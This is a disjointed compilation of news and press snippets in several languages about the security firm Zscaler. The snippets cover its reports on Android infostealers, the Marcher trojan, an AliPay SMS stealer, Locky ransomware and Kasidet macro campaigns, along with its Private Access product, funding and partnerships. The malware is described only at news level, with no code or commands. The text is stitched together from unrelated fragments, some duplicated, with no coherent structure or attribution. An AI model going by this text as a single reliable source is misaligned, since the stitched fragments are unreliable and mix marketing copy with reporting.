Android Infostealer was first found by Zscaler inside third-party Android app stores in China, which are notorious for serving up malware disguised as legitimate apps. However, Zscaler found new instances of it in April, disguised as an update to the browser Google Chrome. Several rogue URLs were offering a download file titled Update_chrome.apk. When the user installs the APK, it prompts for administrative access. Worryingly, the malware payload is capable of checking for installed security applications and terminating them. Zscaler saw hard coded checks for antivirus applications like Kaspersky, ESET, Avast and Dr. Web.
Zscaler notes that the malware is powerful enough and can be used to compromise privacy of Android device users and leak critical information like credit card information which, can in turn, lead to cases of financial banking fraud.
Security researchers discovered malware targeting Android devices that disguises as a Google Chrome update package in an attempt to fool users and lower their defenses.
Zscaler researcher Viral Gandhi said in a blog post that the malware's author uses domain squatting on several URLs that mimic those of a Google Android update in order to trick users and spread the Infostealer. He added the fake URLs are very short lived being, regularly replaced with newer ones to serve the malware and effectively evade URL based filtering.
Zscaler has been working on the Private Access technology for nearly three years, according to Patrick Foxhoven, CIO and vice president of Emerging Technologies at Zscaler. He added that Private Access is functionally different from a traditional Internet Protocol Security (IPsec) or Secure Sockets Layer VPN (SSL-VPN). "The VPN space hasn't been disrupted in a meaningful way in over a decade," Foxhoven told eWEEK. "We wanted to bring a disruptive cloud-scale approach to the challenge of remote access.”
According to Zscaler’s Director of Security Research Deepen Desai, Update_chrome.apk is spreading via “compromised or malicious websites using scareware tactics or social engineering.” Desai told ZDNet that the firm has seen Android malware use “scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection."
The research team at technology company Zscaler has unearthed new Android Infostealer malware which is capable of harvesting call logs, SMS data, browser history and banking information and sending them to a remote command and control server. What’s more, the firm says the malware, which disguises itself as a Google Chrome update, also has the ability to go unseen by checking for well-known installed anti-virus applications such as Kaspersky, ESET and Avast and terminating them.
Criminals continue devoting attention to mobile malware. Zscaler finds information stealing Android malware circulating in the wild posing as a Chrome update.
BT annonce aujourd’hui la connexion directe de son réseau mondial aux points d’accès Zscaler afin de permettre à ses clients de bénéficier d’une plus faible latence et d’optimiser à la fois les performances des applications et celles des interconnexions Internet sécurisées. Cette amélioration des interconnexions réduit la nécessité de déplacer le trafic sur de grandes distances pour accéder aux points d’accès sécurisés de Zscaler.
BT has directly connected Zscaler access points to the company’s global network so that BT customers can benefit from lower latency and better performing applications. The improved interconnectivity reduces the need to move traffic over great distances to access Zscaler nodes for secure internet access.
Director of Security Research at Zscaler, Deepen Desai, told ZDNet, “The malware may arrive from compromised or malicious websites using scareware tactics or social engineering.” An easy way to avoid that trouble is to stay away from questionable websites in the first place, and think twice about clicking “Ok.” He said, “One common theme we have seen in recent malicious android application packages involves scareware tactics where the user will see a popup indicating that their device is infected with a virus and asks them to update to clean up infection.”
Syndicated in Yahoo Tech
It’s been hiding, say researchers at Zscaler, in multiple domains similar to Google update paths. Each URL stays online only for a shot time, to be replaced by a new one regularly to avoid detection.
Zscaler is warning Android users about a fake Google Chrome update that installs malware onto their devices. The malware steals information including browser data, banking details, call logs and SMS data which is then sent to a remote server.
Die Remote-Verbindung eines Anwenders zu einer Applikation erfolge dabei aufgrund granularer Richtlinien, die durch den Cloud-basierten Ansatz über eine zentrale Administrationsoberfläche leicht einzurichten und zu verwalten seien. Zscaler Private Access komme damit ohne jegliche Hardware wie VPN-Konzentratoren oder Load Balancer aus und gehe deshalb mit geringem Administrations- und Implementierungsaufwand einher.
“The service is also designed to replace the need for stacks of security gear at individual data centers, to protect traffic going between data centers, as often exists today. ‘If enterprises are looking at moving some of their applications out to an AWS or Google Compute or Azure, they have to extend their network out to those public clouds in order to provide connectivity,’ Wessels says. ‘They want to embrace the agility of the cloud and put their private applications there. But they are having to use old legacy network plumbing tools to be able to extend that connectivity.’”
Der Anbieter erweitert damit seine cloud-basierenden Security-Dienste. Statt wie diese Geräte mit dem Netzwerk zu verbinden, sorgt Zscaler Private Access für den Zugriff von Personen auf Applikationen. So soll Komplexität reduziert und Sicherheit erhöht werden.
Zscaler, spécialiste de la sécurité internet, annonce sous l’appellation Zscaler Private Access, un nouveau service grâce auquel les entreprises peuvent autoriser l’accès à leurs applications et services internes sans compromettre la sécurité de leur réseau.
“The VPN hasn’t changed in 20 years,” says Zscaler’s engineering sales director Mark Ryan as he sets out the case for something called Private Access, his firm’s reinvention of the VPN in a form it believes is more suitable for a world of remote access to cloud applications.
Denzil Wessels, senior director of product management for emerging technologies at Zscaler, said that one of the big use cases was third-parties and independent contractors who need access to apps. With a traditional VPN, their access was only as good as the rules that were defined for them. But, ZPA offers per-application access by user, which means they'll only be able to access the apps they need.”
“An additional benefit of ZPA is that it allows companies to transition off of an existing VPN infrastructure without breaking access. Applications can be moved one at a time into the Zscaler Private Access platform without modifying the existing network. As each application is removed, a smaller, simpler VPN is left behind.”
Zscaler stellt den Clouddienst 'Zscaler Private Access' vor. Dieser ermöglicht es Firmen, Mitarbeitern und Zulieferern granularen und gezielten Zugriff auf einzelne Applikationen und Services zu gewähren, ohne die Sicherheit der Unternehmensdaten zu gefährden. Dabei spielt es keine Rolle, ob die Anwendungen lokal oder in der Cloud laufen.
Intended as an alternative to traditional VPNs that are difficult to set up and maintain, Zscaler Private Access routes traffic via secure tunnels through a global network of data centers based on which of those data centers will provide the lowest network latency, says Denzil Wessels, senior director of product management for emerging technologies at Zscaler. As part of that process, a Zscaler policy engine ensures that the traffic moving through those tunnels is limited to the applications that any given user has permission to access.
‘Zscaler Private Access extends Zscaler’s security capabilities across the entire spectrum of enterprise traffic, including all web traffic and all private application access, for all ports and protocols,’ said Jay Chaudhry, CEO of Zscaler. ‘We’ve used our cloud security infrastructure to significantly advance the state-of-the-art in security and access to a company’s private applications.’
Zscaler Private Access takes a new approach by decoupling applications from the physical network to deliver granular, per-user access to apps and services running on the internal corporate network, in a data center or in a public cloud. The service is based on Zscaler’s existing global cloud, so there is no requirement for additional hardware or forklift upgrades of existing hardware.Customers are already using this technology in the wild, and they seem pretty happy: MAN Diesel & Turbo ‘is always looking for the state of the art in security technology and have been searching for an alternative to our global VPN solution,’ said Tony Fergusson, IT Infrastructure Architect for MAN Diesel & Turbo. ‘In general, legacy VPN technology is extremely complex, doesn't scale well and, most importantly, lacks application-centric security. Traditional VPNs extend the network perimeter to any user that connects, which is a security risk. Zscaler Private Access allows me to give users access to a single application and not to my entire network. This granular application control is also perfect for the growing demand of contractors and partner access.’”
Cloud security provider Zscaler today announced the introduction of Zscaler Private Access, a new service that enables organizations to provide access to internal applications and services while ensuring the security of their networks.
Denzil Wessels, senior director of product management for emerging technologies at Zscaler, said that one of the big use cases was third-parties and independent contractors who need access to apps. With a traditional VPN, their access was only as good as the rules that were defined for them. But, ZPA offers per-application access by user, which means they'll only be able to access the apps they need.
But several other cyber security companies have put their IPOs on hold for months already. They include Bit 9 + Carbon Black, Veracode and Zscaler, according to venture capitalists.
We use a program called Zscaler as our filtering system. It will work at home as well as it does at school, but it is not 100 percent. It only catches what someone has identified as a problem, so we try to teach our students and teachers safe searching.
Businesses need to employ sandboxing technology and dynamic data analysis in order to counter-act aggressive corporate ransomware attempts. In the coming months, we will continue to see ransomware become increasingly corporate focused, and as it does, enterprises won’t get away with paying consumer prices. Hackers will narrow their attacks to target enterprise servers and in doing so, will demand much, much more. The criminals behind ransomware campaigns are savvy and now that they’re realising that they can lock up enterprise source code and important financial documents, they know they’re in for a big payday.
Wanting to allow mobile workers to work remotely, another commercial company, Zscaler, noting the move to cloud services in Web 2.0, decided to introduce a cloud-based security service; company CISO Michael Sutton explained that although “SSL by default is great for privacy, it is terrible for the enterprise.”
We’ve added four contributing members since then. The contributing members are Reversing Labs, Barracuda, Zscaler and Eleven Paths. We sort of put a cap on it last year while we got our act together. We had to learn how to trust each other and we had to build some infrastructure to allow efficient sharing.
Skyhigh a d’ores et déjà établi un partenariat avec Bay Dynamics, Bitsight, Centrify, Checkpoint, Cisco, Cyphort, Exabeam, Gemalto, HPE, IBM, Ionique, Juniper Networks, Logrhythm, Microsoft, Mobileiron, Okta, Onelogin, Ping Identity, Titus, Vera, VMware, et Zscaler.
"Besides being able to quickly pivot their network infrastructure and delivery techniques, and being able to generate randomized payloads to avoid signature-based blocks, they also use tactics like code-signing certificates to give their installers an extra air of legitimacy," Desai said. "We were able to identify them with the Zscaler Behavioral Analysis Engine, which allowed us to evaluate the threats on the basis of what they will actually do on a user's machine versus how they're coded."
In September, Google invested in Zscaler, an Internet security company, in a $25 million continuation of its Series D round. In total in that round Zscaler raised $110 million.
Zscaler, San Jose, Calif., Cloud Security Platform
Skyhigh a d’ores et déjà établi un partenariat avec Bay Dynamics, Bitsight, Centrify, Checkpoint, Cisco, Cyphort, Exabeam, Gemalto, HPE, IBM, Ionique, Juniper Networks, Logrhythm, Microsoft, Mobileiron, Okta, Onelogin, Ping Identity, Titus, Vera, VMware, et Zscaler.
The tech hub's venture capitalists were investing so much money in startups worth at least a billion dollars that a baby one-horned horse was born every four days. They often had cute, if difficult to interpret, names, like Twilio, Sprinklr and Zscaler.
Locky ist eine der aktivsten und lukrativsten Malware-Varianten, die in den letzten drei Jahren ihre Kreise gezogen hat. Die Ransomware folgt dem bereits bekannten Modell der asymmetrischen Verschlüsselung, um die Dokumente des Nutzers zu sperren und Lösegeld für die Entschlüsselung zu erpressen. Es ließ sich darüber hinaus eine Überschneidung zwischen den URLs feststellen, die zur Auslieferung der Locky- und Dridex-Payloads benutzt wurden.
Training starts with feeding it firewall and proxy system logs from vendors like Blue Coat, Cisco, Zscaler, Palo Alto, Juniper Networks and others
These currently include devices from Blue, Cisco, Zscaler, Fortigate, Palo Alto, McAfee, Check Point, Squid, Juniper, Sophos, Websense, and Microsoft.
Zscaler’s route to market has been through large service providers. It has relationships with companies such as Verizon, BT, Orange Business Services, AT&T, along with many other regional service provider relationships and value-added, nimble resellers who are delivering mobility and digital solutions to the enterprise market, [Scott Robertson] said. In Australia, it has relationships with companies like Telstra, Optus and The Missing Link.
Details regarding the actual attack and what government systems were infected is scant. Government officials said it knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,” Deepen said.
According to Microsoft Technet's official site, this service can support firewalls and proxies like Blue Coat, Cisco, Fortigate, Zscaler, Palo Alto, Check Point, McAfee Secure Web Gateway, and many more.
Supported devices include firewalls and proxies from most major vendors, among them Blue Coat, Cisco, Zscaler, Fortigate, Palo Alto, Check Point, Websense, Juniper, and Microsoft’s own Forefront Threat Management Gateway.
Zscaler Logiciel 1 0,138 Juillet 2015 Etats-Unis
Making that jump, however, drove Somerville/ISNet to reconsider how its SECaaS services – which bundle commercial antivirus, intrusion prevention, VPN and other security tools from the likes of Cisco Systems, McAfee, IronPort Systems, Zscaler, and Check Point Security Systems – could keep up with surging demand.
Zscaler warned that the Locky ransomware family is still going strong and that it has blocked 75 unique and new payloads that was targeting its customers. They warned that the ransomware authors have migrated from infecting Microsoft Word documents to now delivering the malicious content through zip attachment files in spam emails.
On the list of 174 unicorns compiled by Fortune, SMB software companies are few in number: Stripe, Zenefits, DocuSign, CloudFlare, Zscaler and Powa are among them.
Elsewhere in the security world, Zscaler has discovered new instances of the Locky ransomware that was used to target the Hollywood Hospital last month.
In both attacks, cyber criminals used the same ransomware known as Locky, which arrives via email attachments and encrypts all the data on an infected system and deletes the originals. Security firm Zscaler says it has blocked around 75 unique and new payloads from this ransomware family in the past month alone.
Zscaler delivers a safe and productive Internet experience for every user, from any device and from any location – 100% in the cloud. With its multi-tenant, distributed cloud security platform, Zscaler effectively moves security into the Internet backbone, operating in more than 100 data centers around the world.
Zscaler head of security research Deepen Desai said now that BinDiff is free, it will help application security and malware coverage. “The graphical view provided by BinDiff makes it easier to spot the similarities as well as differences in the disassembled code. This tool can be used for identifying new vulnerabilities as well verifying vulnerability fixes by comparing the vendor patches with the original file,” Desai said.
TPG Growth, the middle market growth equity platform of TPG, has partnered with companies such as Airbnb, Domo, Uber and Zscaler and recently led the incubation and launch of STX Entertainment.
The current valuation of Zscaler is $1 billion, which was founded in 2007 by Jay Chaudhry. The startup provides automated threat forensics and dynamic malware protection against advanced cyber threats, such as advanced persistent threats and spear phishing for more than 6,000 corporate, government and military organizations and more than 15 million paying users.
Internet Protect Pro is a cloud-based firewall based on software from Zscaler. For its German customers, Deutsche Telekom will run it in its own data centers in Biere, Germany, ensuring that their data doesn't leave the country.
Zscaler has uncovered new instances of the Android Marcher Trojan being hidden as a flash player for watching pornography on Android devices – by prompting users to update their flash player through the Google Play Store an deceiving users into filling in their payment details, the proprietors are exploiting goodness knows how many hapless porn-watchers.
Die neue Einheit Telekom Security, die vom 1. Januar 2017 an offiziell als eigener Geschäftsbereich starten soll, wird den Angaben zufolge die Sicherheitsbereiche aus verschiedenen Konzerneinheiten bündeln. Das Ziel: die Schlagkraft des Bonner Konzerns am Markt für Cybersecurity erhöhen. Dabei geht man auch neue Wege - zum Beispiel mit der Sicherheitslösung „Internet Protect Pro“ in Kooperation mit dem amerikanischen Hersteller Zscaler.
Zscaler is quickly becoming one of the most popular cloud security vendors around. The company's Zscaler platform uses a SaaS model to protect organizations from threats coming to or from the Internet, as well as public and hybrid clouds.
Zscaler delivers a safe and productive Internet experience for every user, from any device and from any location – 100% in the cloud. With its multi-tenant, distributed cloud security platform, Zscaler effectively moves security into the Internet backbone, operating in more than 100 data centers around the world.
Researchers said they captured over 50 unique payloads from this campaign serving a fake adobe flash player for watching porn. The goal of the malware is to steal the user's financial information from a phishing page designed to mimic the Google Play store payment page that supposedly needs to be filled out before a victim can access the “content,” researchers said.
Security firm Zscaler is warning about a new variant of the Android Marcher Trojan that is using Adobe Flash and adult content sites as a way to trick users into becoming infected and giving up financial information. Many different vulnerabilities show up in Adobe Flash—in fact, Adobe just released fixes to address 23 of the latest security flaws this week.
Any action that leads to the opening of Google Play store app will trigger the fake payment screen to appear, it said. “This is a new tactic for Marcher where the malware authors are pushing a redirect link to the official Google Play store and the X-Video app,” Zscaler told Threatpost. Researchers theorize the redirect is likely to force the Google Play store app to launch.
Rather, the Android Marcher Trojan uses a fake version of an Adobe Flash Player installer to infect users. "The majority of the Marcher Trojan downloads that we are blocking in the cloud are from porn sites," Deepen Desai, head of security research at Zscaler, told eWEEK. This appears to be a popular social engineering tactic where the user is prompted to install the Flash Player update to view the porn video and the attack cycle can start with an email or SMS."
The tricky balance between back doors and encryption: Zscaler's Jay Chaudhry
At the 2016 RSA Conference, CSO's Steve Ragan chats with Zscaler CEO Jay Chaudhry about the Apple/FBI case, and whether there's a way to have encryption backdoors without letting everyone in.
The researchers warned that ransomware has now migrated from holding Windows PCs users to ransom onto the Android OS, with several varieties attacking the open source platform in 2015. Last September for example, Zscaler discovered a nasty piece of Android ransomware in the form of the Adult Player app. This app was not available to download from the Android app store but had to be accessed from other sites, and appeared to offer pornographic videos.
Zscaler is the only true integrated cloud security platform. It delivers carrier-grade internet security, advanced persistent threat (APT) protection, data loss prevention, SSL decryption, traffic shaping, policy management and threat intelligence – all without the need for on-premise hardware, appliances or software. Zscaler’s cloud-based Next Generation Firewall fills the security whitespace, allowing for better visibility, control and protection for the entire extended enterprise, with a total cost of ownership up to 90 percent lower than hardware-based protections.
Larry Biagini, General Electric's former chief tech officer, has ditched retirement to become chief tech evangelist at the Internet traffic-scrubbing startup Zscaler.
“It made sense for us to have someone who can evangelize the message,” says Jay Chaudhry, Zscaler’s founder, chief exec, and chairman, on a call with Fortune. “Quite often a (chief information officer) will say, I like what you’re saying but I’m nervous about moving to the cloud. It’s a major change and the whole business depends on it.” Chaudhry says he met Biagini four years ago while courting GE and that the two got along well. Now Biagini has been enlisted to help steer Zscaler’s marketing and product strategy, Chaudhry says.
Mobily has introduced information security services in the Kingdom, based upon the “highest international standards.” The company has developed valuable international partnerships to facilitate provision of optimal services. This includes partnerships with organizations such as Zscaler, Arbor and IBM, among others.
"What Zscaler does is see who is coming in and going out. If your PC is calling a host in Korea, you cut it off and inform the IT department," Jay says. "In the competitive world of IT security - there is a shouting match, we cover more threats, we're up to speed. It is a race to the bad guys but being in the cloud is very beneficial. We're set apart. Security boxes inspect traffic but they don't inspect everything because it uses more cycles. They say look at the header, they may look at source, they may look at behaviour. But we put our R&D into inspecting every byte that goes in and out. Tracking a phone call is easy but inspecting the content of the conversation is hard. That's what we do. We inspect the content. So my software does it better than any box."
MarketsandMarkets says SECaaS will grow from $3.1 billion in 2015 to more than $8.5 billion in 2020. That’s a compound annual growth rate of 22 percent. This is largely due to the increasing bring-your-own device (BYOD) trend among businesses worldwide... MarketsandMarkets names Symantec, McAfee, Cisco, Trend Micro, CipherCloud, Zscaler, Alert Logic, Radware and others as “major vendors.”
Evidently, research by Zscaler shows the phony application contains one sinister Trojan that steals SMS. The malware claims itself to be a 'security control' and so tricks victims that they believe it is an application for making AliPay more powerful. AliPay is described as the East's PayPal having zero transaction fees. Worldwide, over 300 traders are AliPay users. The online payment service enables transactions through fourteen prominent foreign currencies.
Jay Chaudhry, CEO said: "Is being public a destination? No it is a step in the journey. Many companies go public because they need funds to scale. Many go public because VCs have put in money and they want a return and they need to get their money out. ZScaler doesn't have any of those pressures. Public helps the brand, large firms feel more comfortable doing business with public companies because all the numbers are out there. The employees are shareholders and have easy liquidity. But it is a step."
ИБ-эксперты компании Zscaler предупредили пользователей Android-устройств о новой угрозе. Вредоносное ПО маскируется под функцию безопасности популярного приложения для осуществления online-платежей AliPay, но на самом деле представляет собой троян для перехвата SMS-сообщений. Пользователи загружают вредонос в полной уверенности, будто скачивают приложение, усиливающее защиту AliPay. Через три секунды после установки трояна его иконка удаляется, однако сама программа никуда не исчезает. Незаметно для жертвы вредонос регистрирует сервисы Android, способные работать в фоновом режиме и выполнять задачи с длительным временем реализации.
A l’heure de la remise en cause du Safe Harbor, signalons que Skyhigh dispose de trois datacenters situés aux Etats-Unis, en Asie et en Europe (Francfort). Equinix est d’ailleurs la plate-forme retenue par la start-up pour travailler au plus près de se ses clients. Un partenariat a également été noué avec Zscaler pour fournir une solution d’analyse des logs dans les proxys au spécialiste de la sécurité qui travaille notamment avec LVMH et plusieurs banques françaises.
Selon Julien Sobrier, « l’un des gros problèmes, c’est d’avoir une vue d’ensemble de tous les objets connectés et de l’endroit où ils sont situés dans le réseau ». En effet, les entreprises n’ont pas encore conscience de la multitude d’objets qui peuvent se connecter au réseau comme la photocopieuse, les smart TV, les systèmes de climatisation et autres éléments de domotique ou encore les badges d’accès. Julien Sobrier a pu observer « dans des études, que dans une banque par exemple, le système réseau pour la climatisation était sur le même réseau que les appareils qui s’occupaient des cartes de crédit ».
Zscaler researchers discovered an Android malware masquerading as a security feature for AliPay, a Chinese online payment app similar to PayPal with a large customer base and used by 65 financial institutions, including Visa and MasterCard. “The fake app is a malicious SMS stealer Trojan” that appears as "Security Controls" to hoodwink victims, they wrote in a blog post.
According to Zscaler research, the fake app is a malicious SMS stealer Trojan. It portrays itself as "security controls," tricking victims into thinking it’s an app enhancing AliPay. AliPay, the PayPal of the East, is a third-party online payment platform with no transaction fees, supporting more than 65 financial institutions including Visa as well as MasterCard. Globally, more than 300 merchants use AliPay. It also supports transactions in 14 major foreign currencies.
During an ongoing analysis to protect our customers from the latest mobile threats, we came across an Android malware that disguised itself as a security feature for a famous Chinese online payment app, AliPay.
Standalone SMS-stealing trojans are strange because there's not that much they can do. Zscaler suspects that this trojan may be part of a larger cybercrime campaign, alongside other Android hacking tools. SMS stealers are often used together with other malware families, allowing attackers to intercept two-factor authentication codes and payment verification codes for online banking operations.
According to Zscaler, the changing IT landscape, brought on by the shift of applications from the data centre to the cloud and the increased access through mobile devices, introduces new threats that go undetected by appliances deployed in the data centre. As a result, enterprises have to rethink their traditional appliance-centric castle-and-moat security architectures while continuing to provide their users with access to cloud applications and services. To combat this, Zscaler’s cloud security platform provides inline threat protection to guard against cyber attacks, prevent data leakage and allow safe enablement of cloud applications by employees, the company says.
In November 2015, the Cyber Threat Alliance (CTA), an organisation counting Symantec, Fortinet, Zscaler, Intel Security and Palo Alto among its members, put the total damage done by CryptoWall 3.0 at a headache-inducing $325 million. Astonishingly, the world barely blinked at the scale of this estimate.
Zscaler's cloud security platform provides full inline threat protection to guard against cyber attacks, prevent data leakage and enable the safe usage of cloud applications. CloudLock delivers crowdsourced-based application risk scores (CloudLock Community Trust ratings) for more than 101,000 applications, six times as many as any other CASB vendor.
There's probably no more embarrassing way to get a phone bricked by ransomware than through an inability to curb certain, ahem, urges while on the go. But that is exactly what's happening according to researchers at Zscaler who have found that certain porn apps on android are actually no more than a masquerade for ransomware. Even worse, some of them are automatically taking unauthorized selfies of users and using those in ransom letters to make sure they pay up.
SD-WAN also could serve as a simple interface to zScaler or other cloud-based security services, allowing for local internet breakouts without requiring further investment in on-premise security appliances.
С недавних пор злоумышленники возродили интерес к макросам Microsoft Office, активно используемым для распространения банковских троянов, а в последнее время и вредоноса BlackEnergy. По информации исследователей из американской компании zScaler, данную технику применяют операторы трояна Kasidet, также известного как Neutrino. Вредоносные макросы Office распространяются в виде вложений в фишинговые письма. По наблюдениям zScaler, за последние две недели активность вредоносной спам-кампании значительно возросла. Помимо Kasidet, тот же VBA-дроппер загружает банковский троян Dridex.
Researchers at Zscaler spotted attackers using macro malware as a vector to spread the Neutrino bot, also known as Kasidet, via spearphishing emails. Over the past two weeks, attackers have been using the same visual basic for applications (VBA) macros found in Microsoft Office that have been leveraged to place Dridex to drop Neutrino as well, according to a Jan. 29 security post.
Today, vendors are emerging with solutions to deliver guaranteed application performance to the modern users and workloads of the hybrid enterprise, by applying the SDN principles to the WAN in the form of so-called SD-WAN solutions. A simple interface to Zscaler or other cloud-based security services enabling local Internet breakouts without requiring further investment in on-premises Internet security appliances.
A Chinese government website got hit by a ransomware malady. Initially exposed by Zscaler IT security company in November 2015, this virus campaign put all visitors of cxda.gov.cn web page at risk. Whenever a person visited the compromised website, a malicious script would reroute their traffic to a third-party page hosting the Angler exploit kit. The exploit kit was leveraged to contaminate the users with CryptoWall 3.0 ransom Trojan. Luckily, the infection was shortly removed from the site. This case is unique because it was the first time ransomware distributors took advantage of a government website to infect unsuspecting end users.
Zscaler looks to bring the best of cloud computing to the Internet security market. With a per-user subscription model based fully in the cloud, Zscaler acts as a "check post" between an enterprise and the Internet, scanning traffic using its solutions for Internet security, advanced persistent threat protection, data loss prevention, SSL decryption, traffic shaping, policy management and threat intelligence.
"Malicious Office document file is a popular vector for malware authors to deliver their payloads. Dridex authors have leveraged this technique for over a year and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads," the researchers wrote.
The Neutrino bot is getting a new boost of rejuvenation from a retro form of distribution that's been making a huge comeback lately. According to research last week out from Zscaler, Neutrino--also known as Kasidet--has spiked again in the wild with the help of malicious Microsoft Office macros. This latest example of VBA-related malware is another piece of evidence that a once forgotten class of malware has roared back to life in the last 18 months. The delivery of Kasidet backdoors is the continuation of a months-long series of campaigns to drop the Dridex banking malware on victim computers using malicious macros, Zscaler researchers say.
“Malicious Office documents are a popular vector for malware authors to deliver their payloads,” said Zscaler researchers, in the analysis. “Dridex authors have leveraged this technique for over a year and it was interesting to see the same campaign and URLs being leveraged to deliver Kasidet payloads. While this does not establish any links between the two malware family authors, it reaffirms the fact that a lot of the underlying infrastructure and delivery mechanisms are often shared by these cyber criminals.”
There are two techniques used by the malware to steal data. The first is to use memory scraping to take data from PoS systems. This is done by checking any memory space used by a number of system functions. The second approach is to hook to the browser and this is where Kasidet is having good success on users machines. Internet Explorer (all versions), FireFox and Chrome are all susceptible but Zscaler has not said if Microsoft Edge, its latest browser is also affected.
What makes this announcement interesting is that it comes hot on the heels of yet another malware, in this case Kasidet, being exposed by Zscaler and being distributed by macros. The risk is that by claiming white lists are the magic bullet Glasswall, and Sim in particular, are at risk of oversimplifying the security message.
It’s well documented that attackers have reignited their love affair with the Office macro, using it as a vector for spreading banking malware and even the BlackEnergy Trojan as of late. According to researchers at the San Jose security company Zscaler, the bot Kasidet, also known as Neutrino, has also adopted this technique. Attackers peddling the bot have stepped it up over the past two weeks, according to a trio of researchers, Abhay Yadav, Avinash Kumar and Nirmal Singh, with the company.
Symantec is on trend. The malware company has extended its DLP to email and storage services. Cloud access security brokers such as Zscaler and Netskope have DLP capabilities (Symantec's former CEO, Enrique Salem, is a Netskope board member).
As companies embrace local Internet breakouts, they must also strengthen their security environments in the branches themselves. To do so, enterprises typically implement secure Web gateways (SWGs) that analyze specific ports such as HTTP/HTTPS and often use SWGs in combination with advanced threat detection (ATD) to detect the more advanced attacks. Now these capabilities are becoming available as a cloud service. Interfacing with a security-service provider such as Zscaler enables local Internet breakouts without requiring further investment in on-premises Internet security appliances.
The investment marks Google Capital’s fourth cybersecurity investment. Earlier ones included in CrowdStrike, Zscaler, and CloudFlare.
VMware, Zscaler, Websense and more all joined in to deliver new features and areas of operations to VeloCloud and further drive that impressive new year.
Early in the year, VeloCloud added complementary cloud security from Zscaler and Websense (now Forcepoint).
Zscaler made a list of the 20 riskiest applications, in terms of actual (attempted) user victimisation and based on data from one of Zscaler’s cloud-based data sets over a period of 180 days from the beginning of 2015. Facebook, Skype and Twitter top the list of sites containing the most malware. Often, users click on or unwittingly download malicious applications without realising they have put themselves and the organisation in danger.
Regionalized services can be deployed in private regional network hubs, owned and operated by the enterprise. For companies that would rather outsource this altogether we are seeing the emergence of security-as-a-service offerings such as Zscaler (which has of order 100 regional hubs), or Unified Communications-as-a-Service (UCaaS) offerings from the likes of Orange Business Services, 8X8, HP and others.
"Providing security as applications migrate to the cloud is increasingly important," said the financial analyst who asked not to be named. "Zscaler is key to providing cloud-based security today. Many of Cisco's competitors partner with Zscaler, which is an added bonus."
Commenting on the investment, Cisco vice president and general manager of the enterprise infrastructure and solutions group said the company "is committed to open networking, and interoperability with the VeloCloud solution will provide our joint customers with additional enhancements for application and cloud services performance." In addition to Cisco, VeloCloud’s vendor partners include BroadSoft, Equinix, Hewlett Packard Enterprise, IIx Console, Intel, VMware, Websense and Zscaler.
ForeScout’s latest round of financing vaults the company into the coveted “unicorn” club, a burgeoning pack of venture capital-backed companies with billion-dollar valuations. As part of the late-stage injection, investors have appraised the firm at $1 billion; other “unicorns” in the cybersecurity category include Tanium, Okta, Illumio, Avast, Lookout, and Zscaler.
Malvertising, or "malicious advertising," is not a new threat, and just a few weeks into 2016 ThreatLabZ has observed a malvertising campaign injecting iframes into banner advertisements that lead to Angler Exploit Kit. Surprisingly, the Angler operators took some vacation for the New Year, as noted by F-Secure, and have only recently resumed operations, so we were surprised to see a malvertising campaign so soon after their break
Venture capitalists last year rushed to fund start-ups touting potential solutions to increasingly widespread and sophisticated cyber attacks. Private cyber security companies including Crowdstrike, Illumio and Zscaler raised rounds of $100m, at valuations thought to be above $1bn in 2015. Tanium’s valuation grew from $1.7bn to $3.5bn in six months last year, according to a person familiar with their fundraising.
This year, Juniper formed a wireless partnership with Aerohive Networks in addition to its alliance with Aruba, which was bought by HP. Juniper says it will continue to stay with Aruba. Software-defined WAN specialist Silver Peak inked alliances with a trio of companies at the same time: hyper-converged startup Nutanix, Infoblox and Zscaler. Cisco created partnerships with the likes of giants Apple and Ericsson, while expanding its Microsoft partnership even though it still sees the Redmond, Wash.-based tech giant as a competitor in some areas. The list of technology partnerships formed in 2015 goes on and on.
Jeff Reed, vice president and general manager of Cisco's enterprise infrastructure and solutions group, noted in a statement that the company "is committed to open networking, and interoperability with the VeloCloud solution will provide our joint customers with additional enhancements for application and cloud services performance." VeloCloud is growing its vendor partnerships list, which now includes Cisco, BroadSoft, Equinix, Hewlett Packard Enterprise, IIx Console, Intel, VMware, Websense and Zscaler.
The natural next step is to look at how organisations can consolidate their existing security functions into one central framework. Results from Forrester support this suggestion. An overwhelming majority (98 per cent) of IT security professionals believe that an integrated security platform would be more effective in delivering a broad range of cyber security capabilities versus point solutions delivered by multiple vendors. In fact, 76 per cent of respondents claimed that the approach would be very effective in comparison.
En 2016, les ransomware devraient de plus en plus toucher le monde de l'entreprise et il y a fort à parier que ces dernières devront s'acquitter de sommes nettement plus élevées que les particuliers. En effet, les criminels qui mènent ces campagnes de racket ne sont pas nés de la dernière pluie, et lorsqu'ils se rendent compte qu'ils ont verrouillé un code source et des documents financiers qui n'ont pas été correctement sauvegardés, vous pouvez avoir la certitude que le montant demandé pourra être des plus excessifs.
McCormack led Websense when Vista Equity Partners, a private equity firm also based in Austin, took the dot-com bust veteran private in 2013 for about $890 million. Its competitors have included Internet traffic-scrubbing cybersecurity firms such as Zscaler, a billion dollar “unicorn” startup, and Blue Coat, a once-public company acquired last year by Bain Capital for $2.4 billion.
Zscaler détecte et publie régulièrement sur son blog des billets concernant les applications malveillantes provenant d’app-stores Android parallèles. Google devra restreindre les autorisations accessibles aux applications non homologuées par le processus de soumission de Google Play. Les applications chargées hors Google Play et qui demandent une autorisation de niveau administrateur devraient prochainement disparaitre. Google va également commencer à imposer des délais acceptables pour les correctifs et les mises à jour de firmware, lesquels sont en grande partie contrôlés par ses partenaires OEM.
However, new findings published by Zscaler's ThreatLabZ revealed that a new malware family is using compromised digital certificates to avoid detection. The way it works is it monitors the activity on an infected PC and conveys that information back to cyber criminals. In order to spread the virus, a phishing campaign is sent around via email. Known as Spymel, the malware is often difficult to spot as it uses legitimate certificates that were issued by DigiCert.
